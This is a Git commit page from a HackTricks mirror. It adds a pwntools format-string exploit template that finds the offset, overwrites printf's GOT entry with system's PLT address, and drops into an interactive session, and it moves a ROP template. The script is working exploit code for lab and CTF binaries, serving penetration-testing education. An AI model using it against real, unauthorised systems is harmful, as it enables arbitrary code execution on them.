Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 06:00:40 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 6 pages modified

Browse source
This commit is contained in:
CPol 2021-03-22 10:43:33 +00:00 committed by gitbook-bot
parent 87e120c205
commit db2b77cd01
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
5 changed files with 125 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
SUMMARY.md
View file

@ -424,8 +424,10 @@
## Exploiting ## Exploiting
* [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md) * [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md)
* [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md) * [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md) * [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
* [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md)
* [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md) * [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
* [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md) * [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md)
* [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md) * [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md)
@ -462,7 +464,6 @@
* [Magic Methods](misc/basic-python/magic-methods.md) * [Magic Methods](misc/basic-python/magic-methods.md)
* [Web Requests](misc/basic-python/web-requests.md) * [Web Requests](misc/basic-python/web-requests.md)
* [Bruteforce hash \(few chars\)](misc/basic-python/bruteforce-hash-few-chars.md) * [Bruteforce hash \(few chars\)](misc/basic-python/bruteforce-hash-few-chars.md)
* [ROP-PWN template](misc/basic-python/rop-pwn-template.md)
* [Other Big References](misc/references.md) * [Other Big References](misc/references.md)
## TODO ## TODO

4
exploiting/linux-exploiting-basic-esp/README.md
View file

@ -400,6 +400,10 @@ Contiene las direcciones absolutas de las funciones que son utilizadas en un pro
or using GEF you can start a debugging session and execute `got` to see the got table. or using GEF you can start a debugging session and execute `got` to see the got table.
You an find a **template** to exploit the GOT using format-strings here:
{% page-ref page="format-string-template.md" %}
#### **Exploit \(format strings\)** #### **Exploit \(format strings\)**
Si modificamos el valor de la dirección de una de estas funciones y apuntamos a una shellcode y esta función se ejecuta después del printf tendremos un exploit. Si modificamos el valor de la dirección de una de estas funciones y apuntamos a una shellcode y esta función se ejecuta después del printf tendremos un exploit.

116
exploiting/linux-exploiting-basic-esp/format-string-template.md Normal file
View file

@ -0,0 +1,116 @@
# Format String Template
```python
from pwn import *
####################
#### CONNECTION ####
####################
# Define how you want to exploit the binary
LOCAL = True
REMOTETTCP = False
REMOTESSH = False
GDB = False
# Configure vulnerabily binary
LOCAL_BIN = "./tyler"
REMOTE_BIN = "./tyler" #For ssh
# In order to exploit the format string you may need to append/prepend some string to the payload
# configure them here
PREFIX_PAYLOAD = b"echo "
SUFFIX_PAYLOAD = b""
def connect_binary():
global P, ELF_LOADED, ROP_LOADED
if LOCAL:
P = process(LOCAL_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTETTCP:
P = remote('10.10.10.10',1338) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
elif REMOTESSH:
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
ROP_LOADED = ROP(elf)# Find ROP gadgets
if GDB and not REMOTETTCP and not REMOTESSH:
# attach gdb and continue
# You can set breakpoints, for example "break *main"
gdb.attach(P.pid, "b *main")
########################################
#### Get format string configuration ###
########################################
def send_payload(payload):
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
log.info("payload = %s" % repr(payload))
P.sendline(payload)
return P.recv()
def get_formatstring_config():
global P
for offset in range(1,1000):
connect_binary()
P.clean()
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
if b"41" in recieved:
for padlen in range(0,4):
if b"41414141" in recieved:
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
recieved = send_payload(payload).strip()
print(recieved)
if b"42424242" in recieved:
log.info(f"Found offset ({offset}) and padlen ({padlen})")
return offset, padlen
else:
payload = b" " + payload
recieved = send_payload(payload).strip()
# In order to exploit a format string you need to find a position where part of your payload
# is being reflected. Then, you will be able to put in the position arbitrary addresses
# and write arbitrary content in those addresses
# Therefore, the function get_formatstring_config will find the offset and padd needed to exploit the format string
offset, padlen = get_formatstring_config()
# In this template, the GOT of printf (the part of the GOT table that points to where the printf
# function resides) is going to be modified by the address of the system inside the PLT (the
# part of the code that will jump to the system function).
# Therefore, next time the printf function is executed, system will be executed instead with the same
# parameters passed to printf
SYSTEM_PLT = ELF_LOADED.plt["system"]
P_GOT = ELF_LOADED.got["printf"]
log.info(f"System PLT address: {hex(SYSTEM_PLT)}")
log.info(f"Printf GOT address: {hex(P_GOT)}")
format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen)
format_string.write(P_GOT, SYSTEM_PLT)
format_string.execute_writes()
# Now that printf function is executing system you just need to find a place where you can
# control the parameters passed to printf to execute arbitrary code.
P.interactive()
```

6
exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md
View file

@ -34,7 +34,7 @@ gcc -o vuln vuln.c -fno-stack-protector -no-pie
## ROP - PWNtools template ## ROP - PWNtools template
\*\*\*\*[**Find my ROP-PWNtools template here.**](../../misc/basic-python/rop-pwn-template.md) I'm going to use the code located there to make the exploit. \*\*\*\*[**Find my ROP-PWNtools template here.**](rop-pwn-template.md) I'm going to use the code located there to make the exploit.
Download the exploit and place it in the same directory as the vulnerable binary. Download the exploit and place it in the same directory as the vulnerable binary.
## 1- Finding the offset ## 1- Finding the offset
@ -251,9 +251,9 @@ rop2 = base + p64(ONE_GADGET) + "\x00"*100
## EXPLOIT FILE ## EXPLOIT FILE
Here you have the final exploit after having performed all the necessary changes to the original [**template.py**](../../misc/basic-python/rop-pwn-template.md) **file**. You can find a template to exploit this vulnerability here:
{% file src="../../.gitbook/assets/template.py" caption="template.py" %} {% page-ref page="rop-pwn-template.md" %}
## Common problems ## Common problems

0
misc/basic-python/rop-pwn-template.md → exploiting/linux-exploiting-basic-esp/rop-pwn-template.md
View file